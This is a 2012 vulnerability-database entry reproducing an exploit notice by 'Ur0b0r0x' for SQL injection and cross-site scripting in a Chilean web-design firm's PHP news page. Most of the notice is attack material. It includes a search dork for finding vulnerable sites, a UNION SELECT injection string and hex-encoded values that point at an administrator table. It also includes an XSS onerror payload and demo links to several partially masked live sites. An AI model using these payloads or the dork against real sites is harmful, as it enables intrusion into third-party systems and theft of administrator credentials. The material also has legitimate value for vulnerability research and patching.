Diseno Internet Cross Site Scripting & SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046082 漏洞类型
发布时间 2012-11-21 更新时间 2012-11-21
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110141
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER 
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 
# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email:  ur0b0r0x_@live.com
# Line:   GreyHat


# Exploit Title: Diseño Internet Chile - SQL Injection / Cross-Site Scripting Vulnerabilities 
# Dork: intext:Diseño www.diseñointernet.cl
# Date: 13/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.diseñointernet.cl/
# Vendor Name: Diseño Internet Chile
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[05/11/2012] - Vulnerability discovered
[08/11/2012] - Vendor notified Dont responsed
[13/11/2012] - Public disclosure 
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/detalle_noticia.php?&id=  < Sql Vulnerability Path >
http://site.com/detalle_noticia.php?&id=  < Xss Vulnerability Path >

# Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6,7,8,9,10,11,12,14,15,16,17,18,19,20,21,22,23,24,25,26--
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>  
# Payload/Comand/Sql=> table_schema=0x706172726F7175695F61646D696E / table_name=0x74626C5F61646D696E6973747261646F72

# Demo_Xss_Sql_Vulnerabilities
http://www.textXXXchile.cl/detalle_noticia.php?id=1'
http://parroquiXXXsusnazareno.info/detalle_noticia.php?id=1'
http://aprXXXd.cl/detalle_noticia.php?id=1'
http://www.apXXjud.cl/detalle_noticia.php?&id=1'